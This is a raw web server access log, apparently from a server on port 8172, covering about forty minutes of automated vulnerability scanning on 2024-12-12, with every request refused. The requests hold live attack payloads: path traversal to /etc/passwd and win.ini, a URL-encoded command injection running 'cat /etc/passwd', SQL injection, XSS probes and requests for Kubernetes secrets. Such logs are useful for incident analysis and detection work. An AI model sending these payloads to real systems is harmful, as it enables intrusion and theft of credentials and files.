19:02:56 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.6+Safari/605.1.15 - 404 7 0 239 2024-12-12 19:02:56 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.1.15 - 404 7 0 55 2024-12-12 19:03:09 103.153.214.94 GET /debug/pprof/ - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 19:03:12 103.153.214.94 GET /debug/pprof/goroutine debug=1 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.4.24 - 404 7 0 38 2024-12-12 19:03:17 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:95.0)+Gecko/20100101+Firefox/95.0 - 404 7 0 43 2024-12-12 19:04:57 103.153.214.94 GET /metrics/v1/mbeans - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 63 2024-12-12 19:05:45 103.153.214.94 GET /wp-content/backups-dup-lite/dup-installer/main.installer.php is_daws=1 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/104.0.0.0+Safari/537.36 - 404 7 0 37 2024-12-12 19:05:48 103.153.214.94 GET /wp-content/dup-installer/main.installer.php is_daws=1 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:85.0)+Gecko/20100101+Firefox/85.0 - 404 7 0 37 2024-12-12 19:06:18 103.153.214.94 GET /login.php - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 209 2024-12-12 19:07:17 103.153.214.94 GET /jeecg-boot/sys/user/querySysUser username=admin 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_6)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.79+Safari/537.36 - 404 7 0 62 2024-12-12 19:07:29 103.153.214.94 GET /fp-content/ - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 42 2024-12-12 19:07:29 103.153.214.94 GET /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 41 2024-12-12 19:07:32 103.153.214.94 GET /flatpress/fp-content/ - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/617.18+(KHTML,+like+Gecko)+Version/17.4+Safari/617.18 - 404 7 0 35 2024-12-12 19:07:34 103.153.214.94 GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.8.22 - 404 7 0 41 2024-12-12 19:07:38 103.153.214.94 GET /login/ - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/96.0.4664.93+Safari/537.36 - 404 7 0 206 2024-12-12 19:08:15 103.153.214.94 POST /api/account/auth/form - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_6)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.79+Safari/537.36 - 404 7 0 200 2024-12-12 19:08:16 103.153.214.94 POST /apisix/admin/user/login - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.198+Safari/537.36 - 404 7 0 210 2024-12-12 19:08:29 103.153.214.94 GET /getCorsFile urlPath=file:///etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 33 2024-12-12 19:08:32 103.153.214.94 GET /getCorsFile urlPath=file:///c://windows/win.ini 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 33 2024-12-12 19:09:58 103.153.214.94 POST /dolphinscheduler/login - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 215 2024-12-12 19:09:59 103.153.214.94 POST /rest/v1/login - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/616.19.3+(KHTML,+like+Gecko)+Version/17.6.11+Safari/616.19.3 - 404 7 0 214 2024-12-12 19:09:59 103.153.214.94 POST /rest/v1/login - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 224 2024-12-12 19:10:02 103.153.214.94 POST /client/api/ - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 214 2024-12-12 19:10:24 103.153.214.94 GET /wp-content/plugins/cab-fare-calculator/tblight.php controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 38 2024-12-12 19:12:16 103.153.214.94 GET /editor_tools/module type=files/admin"><script>alert(document.domain)</script>¶ms=filetype=images 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 78 2024-12-12 19:12:16 103.153.214.94 GET /wp-includes/sym404/root/etc/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 31 2024-12-12 19:12:18 103.153.214.94 GET /html/log - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 34 2024-12-12 19:12:18 103.153.214.94 GET /wp-content/plugins/candidate-application-form/downloadpdffile.php fileName=../../../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/50.0.2661.75+Safari/537.36 - 404 7 0 34 2024-12-12 19:12:50 103.153.214.94 GET /_vti_pvt/service.pwd - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 61 2024-12-12 19:12:51 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 54 2024-12-12 19:13:30 103.153.214.94 GET /files/ldap.debug.txt - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 144 2024-12-12 19:13:31 103.153.214.94 GET /index.php module=Install&view=Index 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 39 2024-12-12 19:13:31 103.153.214.94 GET /cms/admin/group/all - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 68 2024-12-12 19:13:31 103.153.214.94 GET /cgi-bin/config.exp - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 54 2024-12-12 19:14:09 103.153.214.94 GET /index.php content=../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 58 2024-12-12 19:14:12 103.153.214.94 GET /index.php option=com_multimap&controller=../../../../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 52 2024-12-12 19:14:30 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+WOW64;+rv:41.0)+Gecko/20100101+Firefox/128.0+(x64+de) - 404 7 0 31 2024-12-12 19:14:33 103.153.214.94 GET /mnt/overlay/dam/gui/content/assets/metadataeditor.external.html item=$%7b883765*930181%7d 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15 - 404 7 0 49 2024-12-12 19:15:22 103.153.214.94 POST /login/system - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.8.24 - 404 7 0 204 2024-12-12 19:15:23 103.153.214.94 GET /system/console - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/101.0.0.0+Safari/537.36 - 404 7 0 208 2024-12-12 19:16:02 103.153.214.94 GET /ftb.imagegallery.aspx - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:12.0)+Gecko/20100101+Firefox/12.0 - 404 7 0 35 2024-12-12 19:16:27 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.1+Safari/605.1.15 - 404 7 0 201 2024-12-12 19:16:27 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.5.23 - 404 7 0 225 2024-12-12 19:16:50 103.153.214.94 POST /api/json/session/signin - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1.2+Safari/605.1.15 - 404 7 0 209 2024-12-12 19:17:00 103.153.214.94 GET /console/index.html - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 208 2024-12-12 19:18:13 103.153.214.94 GET /cgi-bin/ExportSettings.sh - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+ZOE/2+Safari/605.1.15 - 404 7 0 41 2024-12-12 19:21:03 103.153.214.94 GET /filter/jmol/js/jsmol/php/jsmol.php call=getRawDataFromDatabase&query=file:///etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18363 - 404 7 0 39 2024-12-12 19:21:38 103.153.214.94 GET /kylin/api/user/authentication - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh,+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 197 2024-12-12 19:21:38 103.153.214.94 GET /kylin/api/user/authentication - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 199 2024-12-12 19:21:39 103.153.214.94 GET /kylin/api/user/authentication - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.4.20 - 404 7 0 205 2024-12-12 19:21:39 103.153.214.94 GET /kylin/api/user/authentication - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 204 2024-12-12 19:21:39 103.153.214.94 GET /kylin/api/user/authentication - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 218 2024-12-12 19:21:39 103.153.214.94 GET /kylin/api/user/authentication - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 222 2024-12-12 19:22:06 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 - 404 7 0 42 2024-12-12 19:23:28 103.153.214.94 GET /v2/auth/roles - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 59 2024-12-12 19:23:28 103.153.214.94 GET /application/down.php dw=config/config.php 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.6.20 - 404 7 0 42 2024-12-12 19:23:29 103.153.214.94 GET /.drone.yml - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.25 - 404 7 0 54 2024-12-12 19:23:29 103.153.214.94 POST /login - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:101.0)+Gecko/20100101+Firefox/101.0 - 404 7 0 205 2024-12-12 19:23:29 103.153.214.94 GET / wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 31 2024-12-12 19:24:17 103.153.214.94 GET /index.php target=db_sql.php%253f/../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 42 2024-12-12 19:24:40 103.153.214.94 GET /api/v1/artifact/getArtifact artifact_path=../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:102.0)+Gecko/20100101+Firefox/102.0 - 404 7 0 40 2024-12-12 19:24:40 103.153.214.94 GET /cgi-bin/broker csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.1+20.51 - 404 7 0 54 2024-12-12 19:24:41 103.153.214.94 GET /Wizard.aspx - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.2;+rv:128.0+)+Gecko/20100101+Firefox/128.0 - 404 7 0 30 2024-12-12 19:24:43 103.153.214.94 GET /IND780/excalweb.dll webpage=../../AutoCE.ini 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/90.0.4430.93+Safari/537.36 - 404 7 0 50 2024-12-12 19:24:51 103.153.214.94 GET /Admin/frmWelcome.aspx - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.5.16 - 404 7 0 55 2024-12-12 19:25:10 103.153.214.94 GET /config.json - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12)+AppleWebKit/618.6+(KHTML,+like+Gecko)+Version/17.2+Safari/618.6 - 404 7 0 58 2024-12-12 19:25:10 103.153.214.94 GET /wp-content/ldap-authentication-report.csv - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/617.14+(KHTML,+like+Gecko)+Version/17.4.63+Safari/617.14 - 404 7 0 38 2024-12-12 19:25:26 103.153.214.94 GET /portal/conf/config.properties - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+WebView/3.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 - 404 7 0 40 2024-12-12 19:25:53 103.153.214.94 GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 57 2024-12-12 19:26:06 103.153.214.94 POST /signin - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:83.0)+Gecko/20100101+Firefox/83.0 https://bcvt.kontum.gov.vn:8172/signin? 404 7 0 197 2024-12-12 19:26:06 103.153.214.94 GET /user - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 201 2024-12-12 19:26:23 103.153.214.94 GET /+CSCOE+/session_password.html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 404 11 0 32 2024-12-12 19:26:57 103.153.214.94 GET /configure - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 40 2024-12-12 19:27:30 103.153.214.94 POST /api/user/login - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 215 2024-12-12 19:29:00 103.153.214.94 GET /CFIDE/debug/cf_debugFr.cfm userPage=javascript:alert(1) 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 58 2024-12-12 19:29:04 103.153.214.94 GET /cfusion/debug/cf_debugFr.cfm userPage=javascript:alert(1) 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/45.0.2454.101+Safari/537.36 - 404 7 0 38 2024-12-12 19:29:13 103.153.214.94 GET /aj.html a=devi 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 33 2024-12-12 19:29:25 103.153.214.94 GET /js/elfinder.min.js - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.63 - 404 7 0 37 2024-12-12 19:29:25 103.153.214.94 GET /lucee/admin/web.cfm - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 33 2024-12-12 19:29:29 103.153.214.94 GET /js/elFinder.version.js - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/117.0.0.0+Safari/537.36 - 404 7 0 36 2024-12-12 19:29:29 103.153.214.94 GET /lucee/admin/server.cfm - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.1+20.51 - 404 7 0 39 2024-12-12 19:30:26 103.153.214.94 GET /.../.../.../.../.../.../.../.../.../windows/win.ini - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 0 0 62 2024-12-12 19:30:30 103.153.214.94 GET /.../.../.../.../.../.../.../.../.../windows/win.ini - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.4+Safari/605.1.15 - 404 0 0 102 2024-12-12 19:30:34 103.153.214.94 GET /..../..../..../..../..../..../..../..../..../windows/win.ini - 8172 - 206.238.196.225 Mozilla/5.0+\(Windows+NT+10.0\;+Win64\;+x64\)+AppleWebKit/537.36+\(KHTML,+like+Gecko\)+Chrome/100.0.4896.60+Safari/537.36 - 404 0 0 53 2024-12-12 19:30:36 103.153.214.94 GET /..../..../..../..../..../..../..../..../..../windows/win.ini - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.8.22 - 404 0 0 51 2024-12-12 19:31:29 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 216 2024-12-12 19:32:01 103.153.214.94 GET /index.asp - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:76.0)+Gecko/20100101+Firefox/76.0 - 404 7 0 202 2024-12-12 19:32:08 103.153.214.94 GET /api/experimental/latest_runs - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 43 2024-12-12 19:33:46 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11)+AppleWebKit/616.16+(KHTML,+like+Gecko)+Version/17.0.90+Safari/616.16 - 404 7 0 232 2024-12-12 19:34:03 103.153.214.94 GET /XmlPeek.aspx dt=\\..\\..\\..\\..\\..\\..\\Windows\\win.ini&x=/validate.ashx?requri 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 58 2024-12-12 19:34:45 103.153.214.94 POST / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+ZOE/2+Safari/605.1.15 - 404 7 0 200 2024-12-12 19:34:47 103.153.214.94 GET /index.php option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:87.0)+Gecko/20100101+Firefox/87.0 - 404 7 0 31 2024-12-12 19:34:47 103.153.214.94 GET /get_dkey.php user=admin 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 31 2024-12-12 19:34:49 103.153.214.94 GET /index.php option=com_gcalendar&controller=../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+rv:102.0)+Gecko/20100101+Firefox/102.0 - 404 7 0 37 2024-12-12 19:36:02 103.153.214.94 GET /wp-admin/admin-post.php page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 89 2024-12-12 19:36:02 103.153.214.94 GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd#foo/development - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 400 0 0 80 2024-12-12 19:36:02 103.153.214.94 GET /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.1.2+Safari/605.1.15 - 404 7 0 61 2024-12-12 19:36:02 103.153.214.94 GET /cgi-bin/GetSrvInfo.exe - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 36 2024-12-12 19:36:03 103.153.214.94 GET /resource/file:/etc/passwd/ - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15-620 - 400 0 0 67 2024-12-12 19:36:36 103.153.214.94 GET /index.php option=com_jequoteform&view=../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 31 2024-12-12 19:36:50 103.153.214.94 GET / PagePrincipale/rss&id=1%27+and+extractvalue(0x0a,concat(0x0a,(select+concat_ws(0x207c20,md5(999999999),1,user()))))--+- 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 31 2024-12-12 19:36:59 103.153.214.94 GET /Install/InstallWizard.aspx __VIEWSTATE 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 47 2024-12-12 19:37:16 103.153.214.94 GET /uploads/ - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 36 2024-12-12 19:38:02 103.153.214.94 GET /mailsms/s func=ADMIN:appState&dumpConfig=/ 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:86.0)+Gecko/20100101+Firefox/86.0 - 404 7 0 38 2024-12-12 19:38:38 103.153.214.94 POST /admin/ - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 200 2024-12-12 19:40:19 103.153.214.94 GET /img.php f=/./etc/./passwd 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 38 2024-12-12 19:41:11 103.153.214.94 GET /portal/attachment_clearTempFile.action bean.RecId=1')+AND+EXTRACTVALUE(534543,CONCAT(0x5c,md5(999999999),0x5c))+AND+('n72Yk'='n72Yk&bean.TabName=1 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.13;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 40 2024-12-12 19:41:14 103.153.214.94 GET /portal/attachment_getAttList.action 